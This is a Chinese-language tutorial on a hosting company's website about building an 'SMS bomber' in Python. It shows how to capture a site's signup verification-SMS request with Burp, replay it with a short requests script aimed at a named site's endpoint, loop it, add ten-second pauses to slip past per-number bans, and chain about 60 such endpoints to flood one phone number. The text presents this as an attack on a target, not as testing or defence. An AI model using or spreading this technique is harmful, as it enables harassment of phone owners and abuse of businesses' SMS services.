- 資訊首頁(yè) > 網(wǎng)絡(luò )安全 >
- 怎么用python實(shí)現短信轟炸功能
這篇文章主要講解了“怎么用python實(shí)現短信轟炸功能”,文中的講解內容簡(jiǎn)單清晰,易于學(xué)習與理解,下面請大家跟著(zhù)小編的思路慢慢深入,一起來(lái)研究和學(xué)習“怎么用python實(shí)現短信轟炸功能”吧!
首先
這是一個(gè)網(wǎng)站,他的業(yè)務(wù)存在短信發(fā)送
這個(gè)時(shí)候,我們打開(kāi)神器burp或者其他抓包工具(最好用burp,因為repeater模塊可以滿(mǎn)足我們的需要)
這時(shí)候我給我的火狐掛上代理,然后burp開(kāi)啟攔截
抓到了一個(gè)包,發(fā)送到repeater
進(jìn)入repeater分析數據包
{"mobile":"13xxxxxx","type":"signup"}
這個(gè)是發(fā)送的數據,go走起
看返回的包可以看到是成功的
然后開(kāi)始寫(xiě)我們的python進(jìn)行循環(huán)發(fā)包對目標進(jìn)行轟炸
import requests import json headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0','Cookie': 'da_a=77206194','Referer': 'http://www.demlution.com/'} #data = #print data r = requests.post('/capi/v1/dmhome/send_token',data=json.dumps({"mobile":"手機號碼","type":"signup"}),headers=headers) print(r.text)
先進(jìn)行測試,測試完成后可以for循環(huán)加強腳本的威力,經(jīng)過(guò)我的研究發(fā)現當一個(gè)號碼多次提交后會(huì )被ban,如我一次性發(fā)了10個(gè)包后(也就是發(fā)了十條短信)之后的這個(gè)號碼就不會(huì )再發(fā)了,即使返回的包狀態(tài)是成功,但是短信是發(fā)不到的,其實(shí)我們可以停頓十秒再發(fā)下一個(gè),這樣就不會(huì )被ban,這也是測試知道的
好了,今天我就說(shuō)道這吧,可能大家會(huì )說(shuō)就一個(gè)號碼我直接加入黑名單就ok了,的確,但是我們可以挖掘這類(lèi)型的網(wǎng)站,然后一個(gè)一個(gè)接口發(fā)送一次,60個(gè)接口,一秒鐘就60條短信,威力還是可以的,附上成功的圖片
免責聲明:本站發(fā)布的內容(圖片、視頻和文字)以原創(chuàng )、來(lái)自互聯(lián)網(wǎng)轉載和分享為主,文章觀(guān)點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權請聯(lián)系QQ:712375056 進(jìn)行舉報,并提供相關(guān)證據,一經(jīng)查實(shí),將立刻刪除涉嫌侵權內容。
Copyright ? 2009-2021 56dr.com. All Rights Reserved. 特網(wǎng)科技 特網(wǎng)云 版權所有 珠海市特網(wǎng)科技有限公司 粵ICP備16109289號
域名注冊服務(wù)機構:阿里云計算有限公司(萬(wàn)網(wǎng)) 域名服務(wù)機構:煙臺帝思普網(wǎng)絡(luò )科技有限公司(DNSPod) CDN服務(wù):阿里云計算有限公司 中國互聯(lián)網(wǎng)舉報中心 增值電信業(yè)務(wù)經(jīng)營(yíng)許可證B2
建議您使用Chrome、Firefox、Edge、IE10及以上版本和360等主流瀏覽器瀏覽本網(wǎng)站